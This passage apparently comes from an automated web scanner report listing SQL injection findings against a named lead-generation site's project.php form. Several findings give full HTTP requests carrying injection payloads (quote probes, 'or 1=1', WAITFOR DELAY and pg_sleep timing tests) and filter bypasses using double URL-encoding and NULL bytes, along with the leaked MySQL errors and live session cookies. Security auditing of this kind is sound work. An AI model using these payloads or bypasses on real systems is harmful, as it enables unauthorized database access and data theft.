les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.350. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_493_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_493_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3%2527&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r1im4ivljun42mhd8bd1cd0un3; path=/
Content-Length: 7334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3%2527%2527&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b0dk6472bc7sngo2eulma4hrl5; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.351. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_514_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_514_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.352. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_514_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_514_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:20:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3''&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:20:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.353. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_514_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_514_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3%00'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b36tcacteqaokncjbu2ovbrmh2; path=/
Content-Length: 7326
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3%00''&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qgjqf8p466i58k64op9q8cd6t5; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.354. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_515 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_515 parameter appears to be vulnerable to SQL injection attacks. The payload 15629927'%20or%201%3d1--%20 was submitted in the attributeId_515 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles15629927'%20or%201%3d1--%20&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7382
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
-- &attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.355. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_515 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_515 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_515 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles'&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es'&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles''&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.356. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_555_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_555_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_555_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

